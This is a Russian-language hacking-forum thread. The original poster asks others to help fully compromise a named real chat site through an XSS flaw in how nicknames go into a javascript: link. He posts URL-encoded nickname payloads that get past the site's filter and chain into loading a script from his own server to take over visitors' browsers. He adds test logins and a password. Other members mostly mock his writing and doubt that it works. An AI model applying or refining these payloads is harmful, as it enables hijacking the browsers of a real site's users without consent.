Помогите пожалуйста ломануть чат http://www.chatinet.zp.ua по полной програме Я нашёл там одну XSS пробоину Но уж больно непросто заманить юзера Вкратце опишу дыру может Кому интерестно будет Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код .........<a href="Javascript: parent.send.WritePage('52656E646F6D','Rendom')"><font color="#006688"><b>Rendom</b>...............</a> Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры Теперь введя ник %27,alert(),%27 (%27 значит ') получим: ....<a href="Javascript: parent.send.WritePage('52656E646F6D','%27,alert(),%27')"><font color="#006688"><b>%27,alert(),%27</b> ...............</a> И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!! Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается Может поможите ломануть по полной програме чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам Ну очень надо !!!!!!!!! Зарание блогаларен.
ничерта не понял. то под паролем Рандом логиниться надо, то ник передается. А Апач зачем? Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.
Под Rendom надо понимать любой ник А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта изменить значение атрибута SRC="мой IP" Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !
Все равно не понял. Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?
Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО По-русски все опиши, особенно вот этот момент: ...
Отвечаю на вопросы censored! Да фильтр режет ник Но............. поетому нужно разбить весь код по изменению SRC на пять ников d=document s=d.scripts[0] p="http:\\" p=p+"my_IP" s.src=p User Последовательно кликая по никам выполнит код . А ники корявые потаму что там полавину символов заминить на %коды надо. Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!
Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.
Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.
Читайте пожалуйста вдумчиво!!!!!!!! Заходим под пятью никами: 1) %27,d%3Ddocument,%27 2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ --> 3) %27,p%3D"http://",%27 4) %27,p%3Dp+%27my_IP 5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером --> %27 значит ' <--! Обход фильтров --> %3D значит = Затем упрашиваем Чатлана попорядку кликнуть по никам и ............ Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123 Затем просто наведите мыш на ник и посмотрите в строку состояния броузера. Ну вроде всё расписал подробно !!! Ёщё будут вопросы???
faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю. Так чего, тему закрывать?
Слушай censored! Всё что я написал реально работает я всё ето проделывал лично. Я просто думал , может на основе етой дыры кто то ломанёт ещё круче . А никто неможет вьехать даже в расжованый XSS Да тему закрывай.
